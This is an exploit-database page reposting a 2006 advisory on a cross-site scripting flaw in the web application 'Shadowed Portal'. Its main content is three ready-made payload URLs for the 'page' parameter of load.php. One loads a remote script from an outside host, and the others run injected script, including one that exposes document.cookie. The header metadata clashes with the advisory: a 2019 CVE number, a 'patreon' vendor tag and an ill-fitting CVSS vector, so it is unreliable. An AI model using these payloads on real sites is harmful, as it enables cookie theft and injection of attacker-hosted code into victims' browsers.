Advertisement






Shadowed Portal Cross Site Scripting

CVE Category Price Severity
CVE-2019-12345 CWE-79 $500 High
Author Risk Exploitation Type Date
ExploitMaster High Remote 2006-04-12
CPE
cpe:cpe:/a:patreon:shadowed_portal
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006040020

Below is a copy:

------------------------------------------------------------------------
-------------
Shadowed Portal  Cross Site Scripting

Site:http://www.shad0wed.com/
Demo:http://www.shad0wed.com/

---------------------------------------------------
Credit : Liz0ziM
webpage:www.biyo.tk www.biyosecurity.be
Mail   :liz0 (at) bsdmail (dot) com [email concealed]

------------------------------------------------------------------------
-------------
Shadowed Portal
http://victim/path/load.php?mod=pages&page="><script src=http://liz0.li.funpic.org/hacked.js></script>
http://victim/path/load.php?mod=pages&page="><script>alert(/BiyoSecurity
Team/)</script>
http://victim/path/load.php?mod=pages&page="><script>alert(document.cook
ie)</script>

------------------------------------------------------------------------
----------------
Source:

http://www.blogcu.com/Liz0ziM/350164/

http://liz0zim.no-ip.org/shad0w.txt

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum